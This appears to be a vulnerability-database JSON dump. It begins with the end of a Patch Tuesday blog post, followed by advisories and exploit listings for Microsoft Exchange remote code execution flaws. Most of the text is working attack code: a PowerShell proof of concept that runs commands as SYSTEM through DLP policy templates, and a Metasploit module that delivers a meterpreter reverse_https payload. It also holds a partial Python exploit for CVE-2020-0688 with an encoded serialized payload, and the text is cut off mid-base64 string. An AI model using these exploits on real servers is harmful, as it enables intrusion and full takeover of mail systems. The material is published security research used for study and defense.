its Flash Player browser plug-in, Adobe has once again blessed us with a security update for this program (fixes [one critical flaw](<https://helpx.adobe.com/security/products/flash-player/apsb20-06.html>)). Thankfully, **Chrome** and **Firefox** both now disable Flash by default, and Chrome and **IE/Edg**e auto-update the program when new security updates are available. Adobe is slated to retire Flash Player later this year.\n\nOther Adobe products for which the company shipped updates today include **Experience Manager**, **Digital Editions**, **Framemaker** and **Acrobat/Reader **([17 flaws](<https://helpx.adobe.com/security/products/acrobat/apsb20-05.html>)). Security experts at **Qualys** note that on January 28th, Adobe also issued [an out-of-band patch](<https://helpx.adobe.com/security/products/magento/apsb20-02.html>) for **Magento**, labeled as Priority 2.\n\n\"While none of the vulnerabilities disclosed in Adobe\u2019s release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed,\" said Qualys's **Jimmy Graham**.\n\nWindows 7 users should be aware by now that while a fair number of flaws addressed this month by Microsoft affect Windows 7 systems, this operating system is no longer being supported with security updates (unless you're an enterprise taking advantage of Microsoft's [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 enterprise users).\n\nIf you rely on Windows 7 for day-to-day use, it\u2019s probably time to think about upgrading to something newer. That might be a computer with Windows 10. Or maybe you have always wanted that shiny MacOS computer.\n\nIf cost is a primary motivator and the user you have in mind doesn\u2019t do much with the system other than browsing the Web, perhaps a **Chromebook** or an older machine with a recent version of **Linux** is the answer (Ubuntu may be easiest for non-Linux natives). Whichever system you choose, it\u2019s important to pick one that fits the owner\u2019s needs and provides security updates on an ongoing basis.\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re not losing your mind when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, keep an eye on the [AskWoody blog](<https://www.askwoody.com/2020/february-2020-patch-tuesday-foibles/>) from **Woody Leonhard**, who keeps a close eye on buggy Microsoft updates each month.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-11T23:13:57", "type": "krebs", "title": "Microsoft Patch Tuesday, February 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1280", "CVE-2020-0618", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0729"], "modified": "2020-02-11T23:13:57", "id": "KREBS:95DEE0244F6DE332977BB606555E5A3C", "href": "https://krebsonsecurity.com/2020/02/microsoft-patch-tuesday-february-2020-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "srcincite": [{"lastseen": "2022-04-20T17:15:43", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Exchange Server. Authentication with the \u201cData Loss Prevention\u201d role is required to exploit this vulnerability.\n\nThe specific flaw exists within the processing of the New-DlpPolicy cmdlet. The issue results from the lack of proper validation of user-supplied template data when creating a dlp policy. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nMicrosoft\n\n**Affected Products:**\n\nExchange Server\n\n**Vendor Response:**\n\nMicrosoft has issued an update to correct this vulnerability. More details can be found at: <https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2020-17132>\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-02T00:00:00", "type": "srcincite", "title": "SRC-2020-0032 : Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability (patch bypass)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17132"], "modified": "2020-12-08T00:00:00", "id": "SRC-2020-0032", "href": "https://srcincite.io/advisories/src-2020-0032/", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:49", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Exchange Server. Authentication with the \u201cData Loss Prevention\u201d role is required to exploit this vulnerability.\n\nThe specific flaw exists within the processing of the New-DlpPolicy cmdlet. The issue results from the lack of proper validation of user-supplied template data when creating a dlp policy. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nMicrosoft\n\n**Affected Products:**\n\nExchange Server\n\n**Vendor Response:**\n\nMicrosoft has issued an update to correct this vulnerability. More details can be found at: <https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2020-16875>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-22T00:00:00", "type": "srcincite", "title": "SRC-2020-0019 : Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16875"], "modified": "2020-09-08T00:00:00", "id": "SRC-2020-0019", "href": "https://srcincite.io/advisories/src-2020-0019/", "sourceData": "# Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability\r\n# Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875\r\n#\r\n# Notes:\r\n#\r\n# The (ab)user needs the \"Data Loss Prevention\" role assigned\r\n# [PS] C:\\Windows\\system32>New-RoleGroup -Name \"dlp users\" -Roles \"Data Loss Prevention\" -Members \"harrym\"\r\n# \r\n# Name AssignedRoles RoleAssignments ManagedBy\r\n# ---- ------------- --------------- ---------\r\n# dlp users {Data Loss Prevention} {Data Loss Prevention-dlp users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}\r\n# \r\n# \r\n# [PS] C:\\Windows\\system32>Get-RoleGroup \"dlp users\" | Format-List\r\n# \r\n# RunspaceId : 098e1140-30e3-4144-8028-2174fdb43b85\r\n# ManagedBy : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}\r\n# RoleAssignments : {Data Loss Prevention-dlp users}\r\n# Roles : {Data Loss Prevention}\r\n# DisplayName :\r\n# ExternalDirectoryObjectId :\r\n# Members : {exchangedemo.com/Users/Harry Mull}\r\n# SamAccountName : dlp users\r\n# Description :\r\n# RoleGroupType : Standard\r\n# LinkedGroup :\r\n# Capabilities : {}\r\n# LinkedPartnerGroupId :\r\n# LinkedPartnerOrganizationId :\r\n# Identity : exchangedemo.com/Microsoft Exchange Security Groups/dlp users\r\n# IsValid : True\r\n# ExchangeVersion : 0.10 (14.0.100.0)\r\n# Name : dlp users\r\n# DistinguishedName : CN=dlp users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com\r\n# Guid : fa5c8458-8255-4ffd-b128-2a66bf9dbfd6\r\n# ObjectCategory : exchangedemo.com/Configuration/Schema/Group\r\n# ObjectClass : {top, group}\r\n# WhenChanged : 6/12/2020 11:29:31 PM\r\n# WhenCreated : 6/12/2020 11:29:31 PM\r\n# WhenChangedUTC : 6/12/2020 3:29:31 PM\r\n# WhenCreatedUTC : 6/12/2020 3:29:31 PM\r\n# OrganizationId :\r\n# Id : exchangedemo.com/Microsoft Exchange Security Groups/dlp users\r\n# OriginatingServer : DEAD01.exchangedemo.com\r\n# ObjectState : Changed\r\n#\r\n# Example:\r\n#\r\n# PS C:\\Users\\researcher> .\\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr harrym@exchangedemo.com -pwd user123### -cmd mspaint\r\n# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with harrym@exchangedemo.com:user123###\r\n# (+) executed mspaint as SYSTEM!\r\n# PS C:\\Users\\researcher>\r\n\r\nparam (\r\n [Parameter(Mandatory=$true)][string]$server,\r\n [Parameter(Mandatory=$true)][string]$usr,\r\n [Parameter(Mandatory=$true)][string]$pwd,\r\n [string]$cmd = \"mspaint\"\r\n)\r\n\r\nFunction Get-RandomAlphanumericString {\r\n [CmdletBinding()]\r\n Param (\r\n [int] $length = 8\r\n )\r\n Process{\r\n Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length | % {[char]$_}) )\r\n }\t\r\n}\r\n\r\nfunction Exploit-Exchange {\r\n Param (\r\n [string] $server,\r\n [string] $usr,\r\n [string] $pwd,\r\n [string] $cmd\r\n )\r\n \"(+) targeting $server with ${usr}:$pwd\"\r\n $securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force\r\n $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)\r\n $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds\r\n\r\n $xml = @\"4si<![CDATA[ `$i=New-object System.Diagnostics.ProcessStartInfo;`$i.UseShellExecute=`$true;`$i.FileName=\"cmd\";`$i.Arguments=\"/c $cmd\";`$r=New-Object System.Diagnostics.Process;`$r.StartInfo=`$i;`$r.Start() ]]>\"@\r\n\r\n $n = Get-RandomAlphanumericString\r\n [Byte[]]$d = [System.Text.Encoding]::UTF8.GetBytes($xml)\r\n Invoke-Command -Session $s -ScriptBlock {\r\n New-DlpPolicy -Name $Using:n -TemplateData $Using:d \r\n } | Out-Null\r\n \"(+) executed $cmd as SYSTEM!\"\t\r\n}\r\n\r\nGet-PSSession | Remove-PSSession\r\nExploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://srcincite.io/pocs/cve-2020-16875.ps1.txt"}, {"lastseen": "2022-04-20T17:15:42", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Exchange Server. Authentication with the \u201cRecords Management\u201d role is required to exploit this vulnerability.\n\nThe specific flaw exists within the processing of the Import-TransportRuleCollection cmdlet. The issue results from the lack of proper validation of a user-supplied rule collection. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nMicrosoft\n\n**Affected Products:**\n\nExchange Server\n\n**Vendor Response:**\n\nMicrosoft has issued an update to correct this vulnerability. More details can be found at: <https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2020-17132>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-05T00:00:00", "type": "srcincite", "title": "SRC-2020-0033 : Microsoft Exchange Server ImportTransportRuleCollection ProcessE15Format Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17117", "CVE-2020-17132"], "modified": "2020-12-08T00:00:00", "id": "SRC-2020-0033", "href": "https://srcincite.io/advisories/src-2020-0033/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}], "packetstorm": [{"lastseen": "2020-09-17T14:42:19", "description": "", "cvss3": {}, "published": "2020-09-17T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16875"], "modified": "2020-09-17T00:00:00", "id": "PACKETSTORM:159210", "href": "https://packetstormsecurity.com/files/159210/Microsoft-Exchange-Server-DlpUtils-AddTenantDlpPolicy-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE', \n'Description' => %q{ \nThis vulnerability allows remote attackers to execute arbitrary code \non affected installations of Exchange Server. Authentication is \nrequired to exploit this vulnerability. Additionally, the target user \nmust have the \"Data Loss Prevention\" role assigned and an active \nmailbox. \n \nIf the user is in the \"Compliance Management\" or greater \"Organization \nManagement\" role groups, then they have the \"Data Loss Prevention\" \nrole. Since the user who installed Exchange is in the \"Organization \nManagement\" role group, they transitively have the \"Data Loss \nPrevention\" role. \n \nThe specific flaw exists within the processing of the New-DlpPolicy \ncmdlet. The issue results from the lack of proper validation of \nuser-supplied template data when creating a DLP policy. An attacker \ncan leverage this vulnerability to execute code in the context of \nSYSTEM. \n \nTested against Exchange Server 2016 CU14 on Windows Server 2016. \n}, \n'Author' => [ \n'mr_me', # Discovery, exploits, and most of the words above \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-16875'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875'], \n['URL', 'https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016'], \n['URL', 'https://srcincite.io/advisories/src-2020-0019/'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16875.py.txt'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16875.ps1.txt'] \n], \n'DisclosureDate' => '2020-09-08', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Exchange Server 2016 and 2019 w/o KB4577352', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https', \n'HttpClientTimeout' => 5, \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, \nACCOUNT_LOCKOUTS, # Creates a concurrent OWA session \nCONFIG_CHANGES, # Creates a new DLP policy \nARTIFACTS_ON_DISK # Uses a DLP policy template file \n] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('USERNAME', [false, 'OWA username']), \nOptString.new('PASSWORD', [false, 'OWA password']) \n]) \nend \n \ndef post_auth? \ntrue \nend \n \ndef username \ndatastore['USERNAME'] \nend \n \ndef password \ndatastore['PASSWORD'] \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nunless res.code == 200 && res.body.include?('<title>Outlook</title>') \nreturn CheckCode::Unknown('Target does not appear to be running OWA.') \nend \n \nCheckCode::Detected(\"OWA is running at #{full_uri('/owa/')}\") \nend \n \ndef exploit \nowa_login \ncreate_dlp_policy(retrieve_viewstate) \nend \n \ndef owa_login \nunless username && password \nfail_with(Failure::BadConfig, 'USERNAME and PASSWORD are required for exploitation') \nend \n \nprint_status(\"Logging in to OWA with creds #{username}:#{password}\") \n \nres = send_request_cgi!({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/owa/auth.owa'), \n'vars_post' => { \n'username' => username, \n'password' => password, \n'flags' => '', \n'destination' => full_uri('/owa/', vhost_uri: true) \n}, \n'keep_cookies' => true \n}, datastore['HttpClientTimeout'], 2) # timeout and redirect_depth \n \nunless res \nfail_with(Failure::Unreachable, 'Failed to access OWA login page') \nend \n \nunless res.code == 200 && cookie_jar.grep(/^cadata/).any? \nif res.body.include?('There are too many active sessions connected to this mailbox.') \nfail_with(Failure::NoAccess, 'Reached active session limit for mailbox') \nend \n \nfail_with(Failure::NoAccess, 'Failed to log in to OWA with supplied creds') \nend \n \nif res.body.include?('Choose your preferred display language and home time zone below.') \nfail_with(Failure::NoAccess, 'Mailbox is active but not fully configured') \nend \n \nprint_good('Successfully logged in to OWA') \nend \n \ndef retrieve_viewstate \nprint_status('Retrieving ViewState from DLP policy creation page') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'), \n'agent' => '', # HACK: Bypass Exchange's User-Agent validation \n'keep_cookies' => true \n) \n \nunless res \nfail_with(Failure::Unreachable, 'Failed to access DLP policy creation page') \nend \n \nunless res.code == 200 && (viewstate = res.get_html_document.at('//input[@id = \"__VIEWSTATE\"]/@value')&.text) \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve ViewState') \nend \n \nprint_good('Successfully retrieved ViewState') \nviewstate \nend \n \ndef create_dlp_policy(viewstate) \nprint_status('Creating custom DLP policy from malicious template') \nvprint_status(\"DLP policy name: #{dlp_policy_name}\") \n \nform_data = Rex::MIME::Message.new \nform_data.add_part(viewstate, nil, nil, 'form-data; name=\"__VIEWSTATE\"') \nform_data.add_part( \n'ResultPanePlaceHolder_ButtonsPanel_btnNext', \nnil, \nnil, \n'form-data; name=\"ctl00$ResultPanePlaceHolder$senderBtn\"' \n) \nform_data.add_part( \ndlp_policy_name, \nnil, \nnil, \n'form-data; name=\"ctl00$ResultPanePlaceHolder$contentContainer$name\"' \n) \nform_data.add_part( \ndlp_policy_template, \n'text/xml', \nnil, \n%(form-data; name=\"ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl\"; filename=\"#{dlp_policy_filename}\") \n) \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'), \n'agent' => '', # HACK: Bypass Exchange's User-Agent validation \n'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\", \n'data' => form_data.to_s \n}, 0) \nend \n \ndef dlp_policy_template \n# https://docs.microsoft.com/en-us/exchange/developing-dlp-policy-template-files-exchange-2013-help \n<<~XML \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<dlpPolicyTemplates> \n<dlpPolicyTemplate id=\"F7C29AEC-A52D-4502-9670-141424A83FAB\" mode=\"Audit\" state=\"Enabled\" version=\"15.0.2.0\"> \n<contentVersion>4</contentVersion> \n<publisherName>Metasploit</publisherName> \n<name> \n<localizedString lang=\"en\">#{dlp_policy_name}</localizedString> \n</name> \n<description> \n<localizedString lang=\"en\">wvu was here</localizedString> \n</description> \n<keywords></keywords> \n<ruleParameters></ruleParameters> \n<policyCommands> \n<commandBlock> \n<![CDATA[#{cmd_psh_payload(payload.encoded, payload.arch.first, exec_in_place: true)}]]> \n</commandBlock> \n</policyCommands> \n<policyCommandsResources></policyCommandsResources> \n</dlpPolicyTemplate> \n</dlpPolicyTemplates> \nXML \nend \n \ndef dlp_policy_name \n@dlp_policy_name ||= \"#{Faker::Bank.name.titleize} Data\" \nend \n \ndef dlp_policy_filename \n@dlp_policy_filename ||= \"#{rand_text_alphanumeric(8..42)}.xml\" \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159210/exchange_ecp_dlp_policy.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-03-04T15:06:30", "description": "", "cvss3": {}, "published": "2020-03-02T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 15.2.221.12 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "PACKETSTORM:156592", "href": "https://packetstormsecurity.com/files/156592/Microsoft-Exchange-2019-15.2.221.12-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution \n# Date: 2020-02-28 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 \n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys \n# Vendor Homepage: https://www.microsoft.com \n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4 \n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019 \n# CVE: CVE-2020-0688 \n \n#! /usr/bin/env python \n# -*- coding: utf-8 -*- \n''' \n \n \nCopyright 2020 Photubias(c) \n \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2020-0688-Photubias.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nThis is a native implementation without requirements, written in Python 2. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \nReverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net \n \nExample Output: \nCVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\" \n[+] Login worked \n[+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570 \n[+] Detected OWA version number 15.2.221.12 \n[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable! \n[+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]: \n[+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g== \nSending now ... \n''' \nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass \n \n## STATIC STRINGS \n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations) \nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUH